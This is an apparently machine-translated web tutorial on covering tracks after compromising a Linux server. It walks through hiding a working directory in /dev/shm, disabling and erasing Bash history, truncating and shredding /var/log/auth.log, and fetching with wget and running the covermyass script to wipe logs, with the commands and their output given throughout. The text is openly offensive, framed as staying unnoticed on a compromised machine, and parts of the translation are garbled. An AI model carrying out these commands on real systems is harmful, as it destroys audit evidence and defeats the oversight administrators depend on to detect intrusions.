RuCore.NET – English Version

How to clean up logs and history on Linux systems to hide your traces and go unnoticed.





In order to show you the basics of hiding your traces, we will first compromise the target and then learn some methods used to remove the Bash history, clear the logs and keep it hidden after using Linux.

Step 1 compromising the target

The first thing we need to do is use the target. We can use Injection of commands to abuse the way the server handles OS commands to get the shell.



We also want update our new shell to be fully interactive. This will simplify the overall operation and also allow us to use the Tab completion and terminal history. After that we can extend our privileges to root so that we can take better advantage of the system so that we will not be noticed.

Step 2 create an easy to delete hidden directory

.

After we have root access we can create an open directory to develop and store any scripts or files. This won’t fool anyone but the noobie administrator himself, but another level of caution will certainly not hurt. First let’s find all the writable directories with the following command:

[email protected]:/# find / -perm -222 -type d 2>/dev/null.

/dev/shm
/var/lock
/var/lib/php5
/var/tmp
/var/www/dav
/var/www/twiki/data/Sandbox
/var/www/twiki/data/Main
/var/www/twiki/data/Know
/var/www/twiki/data/TWiki
/var/www/twiki/data/_default
/var/www/twiki/data/Trash
/var/www/twiki/pub/Sandbox
/var/www/twiki/pub/Main
/var/www/twiki/pub/Know
/var/www/twiki/pub/Know/IncorrectDllVersionW32PTH10DLL
/var/www/twiki/pub/TWiki
/var/www/twiki/pub/TWiki/TWikiDocGraphics
/var/www/twiki/pub/TWiki/TWikiTemplates
/var/www/twiki/pub/TWiki/TWikiLogos
/var/www/twiki/pub/TWiki/PreviewBackground
/var/www/twiki/pub/TWiki/FileAttachment
/var/www/twiki/pub/TWiki/WabiSabi
/var/www/twiki/pub/Trash
/var/www/twiki/pub/icn
/tmp
/tmp/.ICE-unix
/tmp/.X11-unix

We can create a hidden directory with from the command mkdir and by adding a point before the name:

.

[email protected]:/# mkdir /dev/shm/.secret

.

If we now list the contents of the file /dev / shm, nothing will appear:

.

[email protected]:/# ls -l /dev/shm/

total 0

So when we use the switch-a to display a list of all files and directories, it is displayed:

.

[email protected]:/# ls -la /dev/shm/

total 0
drwxrwxrwt 3 root root 60 2019-06-19 13:49.
drwxr-xr-x 13 root 13480 2019-06-19 13:41 …
drwxr-xr-x 2 root root 40 2019-06-19 13:49 .secret

And to remove the directory as soon as we are done on the machine, use the command rmdir:

.

[email protected]:/# rmdir /dev/shm/.secret/

Step 3 delete history Bash

Bash stores a list of commands used in the current session so it is important to clear it to hide your traces. We can view the current history using the history command:

.

[email protected]:/# history.

1 cd /
2 ls
3 find / -perm -222 -type d 2>/dev/null
4 cd /dev/shm/
5 cd /
6 mkdir /dev/shm/.secret
7 ls -l /dev/shm/
8 ls -la /dev/shm/
9 ls
10 rmdir /dev/shm/.secret/
11 history

Commands are written to the HISTFILE environment variable, which usually happens bash_history. We can repeat to see the location:

.

[email protected]:/# echo $HISTFILE.

/root/.bash_history

We can use command unset to remove variable:

.

[email protected]:/# unset HISTFILE

.

So when we repeat this nothing appears again:

[email protected]:/# echo $HISTFILE

.

We can also make sure that the command history is not stored by sending it to /dev/null. Set the variable:

for it.

[email protected]:/# HISTFILE=/dev/null

.

Or do the same with the command export:

.

[email protected]:/# export HISTFILE=/dev/null

.

And the history will now be sent to /dev / null :

.

[email protected]:/# echo $HISTFILE.

/dev/null

We can set the number of commands to be saved in the current session to 0 using HISTSIZE:

variable.

[email protected]:/# HISTSIZE=0

.

You can also use the command export:

.

[email protected]:/# export HISTSIZE=0

.

We can also change the number of lines allowed in the history file using the HISTFILESIZE variable. Set its value to 0:

.

[email protected]:/# HISTFILESIZE=0

.

Or with export:

[email protected]:/# export HISTFILESIZE=0

.

Command set can also be used to change the parameters of the shell. To disable the history parameter use the following command:

[email protected]:/# set +o history

.

And to turn it back on:

[email protected]:/# set -o history

.

Analytically, the command shopt can be used to change the parameters of the shell. To disable the log, use the following command:

[email protected]:/# shopt -ou history

.

And to turn it back on:

[email protected]:/# shopt -os history

.

If you execute commands in the target system, sometimes you can avoid saving them in the history by running the command with the leading space:

.

[email protected]:~# cat /etc/passwd

.

This technique does not work all the time and depends on the system.

We can also simply clear the history using the switch-c:

.

[email protected]:~# history -c

.

To make sure the changes are written to disk, use the switch-w:

.

[email protected]:~# history -w

.

This will only clear the history of the current session. To make sure that the history is cleared when you exit the session, the following command will be useful:

[email protected]:/# cat /dev/null > ~/.bash_history && history -c &exit

.

We can also use command kill to exit the session without saving history:

.

[email protected]:/# kill -9 $$

.

Step 4 Clear log files

In addition to the Bash history the log files must also be erased to go unnoticed. Here are some common log files and what they contain:

/var / log / auth.log authentication

/var / log / cron.job log Cron

/var / log / maillog Mail

.

/var / log / httpd Apache

Of course, we can simply delete the log with the command rm:

.

[email protected]:/# rm /var/log/auth.log

.

But this will probably cause red flags so it is better to clear the file rather than erase it completely. We can use truncation to reduce the size to 0:

.

[email protected]:/# truncate -s 0 /var/log/auth.log

.

Note that truncation is not always present on all systems.

We can do the same without displaying anything in the file:

.

[email protected]:/# echo ” > /var/log/auth.log

.

Also with the help of >> clean the file yourself:

[email protected]:/# > /var/log/auth.log

.

We can also send it to /dev / null:

.

[email protected]:/# cat /dev/null > /var/log/auth.log

.

Or use the command tee:

.

[email protected]:/# true | tee /var/log/auth.log

.

We can also use the command dd to not write anything to the log file:

.

[email protected]:/# dd if=/dev/null of=/var/log/auth.log

0+0 records in
0+0 records out
0 bytes (0 B) copied, 6.1494e-05 s, 0.0 kB/s

The shred command can be used to overwrite a file with senseless binary data:

[email protected]:/# shred /var/log/auth.log

.

We can even attach on-zu which will truncate the file and overwrite it with zeros to hide the evidence of grinding:

[email protected]:/# shred -zu /var/log/auth.log

.

Step 5 Use the tool to ensure that things are erased

.

In order to increase the probability that any activity on the target will not be detected, we can use the tool to make sure that everything is erased. Covermyass – is a script that automates most of the processes we have already seen including clearing log files and disabling Bash history.

We can capture the script from GitHub using wget (if we have access to the Internet on target, otherwise it must be passed manually):

.

[email protected]:/# wget https://raw.githubusercontent.com/sundowndev/covermyass/master/covermyass

.

Browse to a directory available for writing and use chmod to make it executable:

.

[email protected]:/tmp# chmod +x covermyass

.

Then we can run it:

.

[email protected]:/tmp# ./covermyass.

Welcome to Cover my ass tool

Select an option :

1) Clear logs for user root
2) Permenently disable auth & bash history
3) Restore settings to default
99) Exit tool

>

There is a user invitation with several options to choose from. Let’s select the first one to clear the logs:

> 1

[+] /var/log/messages cleaned.
[+] /var/log/auth.log cleaned.
[+] /var/log/kern.log cleaned.
[+] /var/log/wtmp cleaned.
[+] ~/.bash_history cleaned.
[+] History file deleted.

Reminder: your need to reload the session to see effects.
Type exit to do so.

We can also disable Bash and auth history with option 2:

.

> 2

[+] Permanently sending /var/log/auth.log to /dev/null
[+] Permanently sending bash_history to /dev/null
[+] Set HISTFILESIZE & HISTSIZE to 0
[+] Disabled history library

Permenently disabled bash log.

And in case you need to clean up in a hurry, just add now to the command:

.

[email protected]:/tmp# ./covermyass now.

[+] /var/log/messages cleaned.
[+] /var/log/kern.log cleaned.
[+] /var/log/wtmp cleaned.
[+] ~/.bash_history cleaned.
[+] History file deleted.

Reminder: your need to reload the session to see effects.
Type exit to do so.

Today we have learned various methods used to hide traces and how to remain unnoticed on a compromised machine. We looked at how to disable and delete Bash history, how to clean up log files, and used the Covermyass tool to ensure that our activities on the target were erased.


17 Views



Spelling error report

The following text will be sent to our editors: